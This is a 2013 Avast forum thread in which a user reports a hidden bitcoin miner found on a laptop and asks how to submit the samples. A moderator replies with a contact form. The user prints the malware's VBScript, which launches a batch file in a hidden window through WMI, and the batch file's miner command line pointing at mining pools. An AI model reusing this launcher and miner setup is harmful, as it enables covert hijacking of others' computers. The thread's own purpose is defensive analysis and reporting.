Author Topic: Drivers.vbs / win32.exe --> mining site  (Read 4465 times)

0 Members and 1 Guest are viewing this topic.

MvR

  • Guest
Drivers.vbs / win32.exe --> mining site
« on: February 11, 2013, 12:11:16 PM »
Hi,

I was playing with Whireshark a few days back and noticed an outgoing connection to a bitcoin mining site. A small investigation did not show anything out of the ordinary so I assumed I did not understand Whireshark enough. Today I found my laptop very active while not doing much on it and found the process "win32.exe" keeping the processor busy for 25%.
An investigation with hijackthis, google and a look in msconfig showed that "win32.exe" was connected to "c:\kernels\drivers.vbs". The content of the file as follows:
Code: [Select]
Const HIDDEN_WINDOW = 12
 
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
 
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:/kernels/processor.bat", null, objConfig, intProcessID)

This points to "C:/kernels/processor.bat" with the following content:
Code: [Select]
@echo off
START  /D C: /B win32.exe -u http://ophelion_1:123@mergedmining.btcguild.com:8332 -b http://1ERX1hr6xbGDgt8cB2whUf9HpeqzTqp3T:x@mining.eligius.st:8337 -k poclbm  DEVICE=0 AGGRESSION=0
Which turns out to be the site I noticed with Whireshark.

Both files are "No thread" according to Avast Free.
The people at eligius.st are familiar with bot nets and note in their FAQ that Avast has blacklisted their server.

With a computer search I found "win32.exe" in the c:\ directory, also to be found as "No threat" by Avast.
As these files are found to be clean, I can not upload them via the virus chest. Is there another way?

Info on drivers.vbs can also be found on http://www.exterminate-it.com/malpedia/file/drivers.vbs, where I have the file with the "d7e9141ccaa04c07b2a3fb72608033fb" hash. I have not looked into the files mentioned there, but it seems I have a Trojan which injected the above files to make my pc part of a mining bot net.

MvR
-----
Wish a wrong captcha would not delete my text...

Offline Asyn

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 76213
  • Urlaub/Vacation
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Drivers.vbs / win32.exe --> mining site
« Reply #1 on: February 11, 2013, 12:20:17 PM »
As these files are found to be clean, I can not upload them via the virus chest. Is there another way?

You can report them here: http://www.avast.com/contact-form.php?loadStyles
W8.1 [x64] - Avast PremSec 22.7.7366.BC [UI.713] - Firefox ESR 91.11 [NS/uBO/PB] - Thunderbird 91.11
Avast-Tools: Secure Browser 103.0 - Cleanup 22.2 - SecureLine 5.18 - DriverUpdater 22.2 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

MvR

  • Guest
Re: Drivers.vbs / win32.exe --> mining site
« Reply #2 on: February 11, 2013, 12:21:56 PM »
Thank you very much. Sorry for the wrong place of posting this. I somehow overlooked the dedicated forum...

MvR

Offline Asyn

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 76213
  • Urlaub/Vacation
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Drivers.vbs / win32.exe --> mining site
« Reply #3 on: February 11, 2013, 12:34:37 PM »
1. Thank you very much.
2. Sorry for the wrong place of posting this. I somehow overlooked the dedicated forum...

1. You're welcome.
2. No problem.
W8.1 [x64] - Avast PremSec 22.7.7366.BC [UI.713] - Firefox ESR 91.11 [NS/uBO/PB] - Thunderbird 91.11
Avast-Tools: Secure Browser 103.0 - Cleanup 22.2 - SecureLine 5.18 - DriverUpdater 22.2 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0